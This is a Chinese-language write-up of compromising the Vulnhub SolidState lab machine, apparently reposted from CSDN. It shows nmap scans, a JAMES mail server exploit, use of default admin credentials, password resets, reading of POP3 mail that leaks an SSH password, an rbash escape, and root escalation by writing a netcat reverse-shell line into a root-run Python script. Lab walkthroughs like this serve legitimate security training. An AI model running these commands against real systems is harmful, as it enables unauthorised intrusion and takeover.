首页 > 其他分享 >Vulnhub-SolidState打靶

Vulnhub-SolidState打靶

时间:2024-12-25 22:26:25浏览次数:4  
标签:登录 213.141 nmap 打靶 192.168 提权 SolidState Vulnhub ssh

目录

一、nmap扫描

二、pop3泄露的ssh密码登录ssh,并rbash逃逸

三、root权限脚本反弹shell提权

四、总结


一、nmap扫描

nmap -sT --min-rate 10000 192.168.213.141 -oA nmapscan/port

扫描tcp开放了那些端口,保存到nmap/port中

nmap -sU --min-rate 10000 192.168.213.141  -oA nmapscan/port

扫描udp开放了那些端口,保存到nmap/udp中

nmap -sT -sC -Pn -v -sV -O 192.168.213.141  -oA nmapscan/detail

对开放的端口进行详细的探测,保存到detail中

nmap --script=vuln 192.168.213.141  nmapscan/vuln 
使用nmap的漏洞扫描脚本进行漏洞扫描

二、pop3泄露的ssh密码登录ssh,并rbash逃逸

通过nmap扫描发现,25,110,119,4555端口都有一个关键词“JAMES”,使用searchsploit进行搜索  searchsploit james

searchsploit -m 50347

根据说明构造语句

python 50347.py 192.168.213.141 192.168.213.128 8888

nc -lvnp 8888

发现不能直接getshell

但是在py脚本里发现了james-admin默认密码

之前用nmap进行端口扫描的时候,知道了4555端口是james-admin 服务

telnet 192.168.213.141 4555    成功登录

列出来用户,有一个命令是setpassword,对列出的用户修改密码,目的看看那个用户能登录pop3

登录pop3           telnet 192.168.213.141 110

在mindy 用户发现接收的邮件

stat   看是否有邮件

list     列出有几封,并写出长度

top 1 1109     看第一封邮件,长度为1109

在第二封邮件发现ssh密码

ssh登录       ssh mindy@192.168.213.141

发现是rbash,进行rbash逃逸

ssh mindy@192.168.213.141 "export TERM=xterm;python -c 'import pty;pty.spawn(\"/bin/bash\")'"

三、root权限脚本反弹shell提权

sudo提权X

内核提权X (可以看出靶机作者并不想考怎么进行内核提权)

自动任务提权X

SUID Polkit提权X

systemd-run -t /bin/bash

使用CVE-2021-4034进行提权,也是不行

ps -aux | grep james

发现一个以root权限执行的py脚本,反弹shell获得root权限

echo 'import os; os.system("/bin/nc 192.168.213.128 443 -e /bin/bash")' > /opt/tmp.py  

nc -lvnp 443

 提权成功,

四、总结

通过James-admin的默认密码登录后,修改所有用户的密码后,登录pop3发现邮件里面的ssh密码,登录并进行rbash逃逸,最后使用root执行的py文件进行提权。

标签:登录,213.141,nmap,打靶,192.168,提权,SolidState,Vulnhub,ssh
From: https://blog.csdn.net/a2FpX2tr/article/details/144700708

相关文章

  • SolidState靶机通关教程及提权
    声明!本文章及工具分享仅仅只是供大家学习交流为主,如有任何触犯法律的行为,均与本人及团队无关!!!工具链接:https://pan.quark.cn/s/33795a10039c一、靶机搭建点击扫描虚拟机选择靶机使在文件夹即可建议kali和靶机的网络都使用NAT模式二、信息收集1.扫出ip信息nmap-sN192......
  • 「玩转 Vulnhub:Kioptrix 5 靶机的渗透与解题思路」
    获取靶机地址:点击领取获取更多资料工具:点击领取信息收集主机发现首先我们要找到靶机的ip,先用kali扫一圈同网段存活的ip,再将靶机打开,然后接着再扫一遍sudo arp-scan -l端口扫描下一步是收集有关靶机上运行的服务的信息。sudo nmap -p- -A 192.168.17.129发......
  • Vulnhub 靶场 N00b: 1
    先下载靶机靶机地址:https://www.vulnhub.com/entry/noob-1,746/收集信息1.发现靶机IP首先查看kaili的IP靶机要和kali在同一模式下(NAT)靶机ip arp-scan--interface=eth0--localnet 这里也是找到了IP2.端口扫描 nmap -sS-sV-T4-A-p-192.168.239.9......
  • upload-labs实战打靶
    Pass-01:提示不支持php文件类型在控制器查看源代码,并修改文件输入类型修改完成,回车,上传文件,得到一个图像打开图像所在位置,复制网址,进入php页面pass-02:通过抓包,修改文件类型得到图像,复制图像的网址,在菜刀里打开pass-03:查看源代码显示,几种文件类型不支持,在抓包工具里......
  • 渗透之SolidState靶机
    目录1、信息收集1.1namp扫描1.扫描端口2.端口详细信息3.脚本扫描1.2nikto1.3gobuster2、信息整合2.1、端口服务2.2、页面3、渗透3.1获取shell1.JAMES漏洞2.尝试默认密码3.修改邮箱用户密码4.查看用户邮件5.进入ssh6.逃逸rbash获取到正常......
  • 靶场奇妙记之SolidState
    公众号:泷羽Sec-Ceo声明!        学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的......
  • Vulnhub 靶场 Jetty: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/jetty-1,621/DescriptionBacktotheTopThecompanyAquariumLifeS.L.hascontactedyoutoperformapentestagainstoneoftheirmachines.Theysuspectthatoneoftheiremployeeshasbeencommittingfraudsel......
  • Vulnhub 靶场 DevGuru: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/devguru-1,620/kali攻击机IP:192.168.11.128靶机IP:192.168.11.130一、信息收集1.使用nmap对目标靶机进行扫描开了22、80、8585端口。发现git目录,且提示做解析:192.168.11.130devguru.local2.80端口发现用的是Octo......
  • 打靶记录21——Cereal
    靶机:https://download.vulnhub.com/cereal/Cereal.ova难度:高(最接近真实场景)目标:取得root权限+2Flag攻击方法:主机发现端口扫描信息收集路径枚举密码爆破域名解析匿名FTP子域名爆破源码审计反序列化漏洞进程监视本地提权主机发现sudoarp-scan-l......
  • Vulnhub nxy
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.132UDP扫描nmap-sU--top=2010.10.10.132详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,8010.10.10.132漏洞扫描nmap--script=vuln-p22,8010.10.10.1......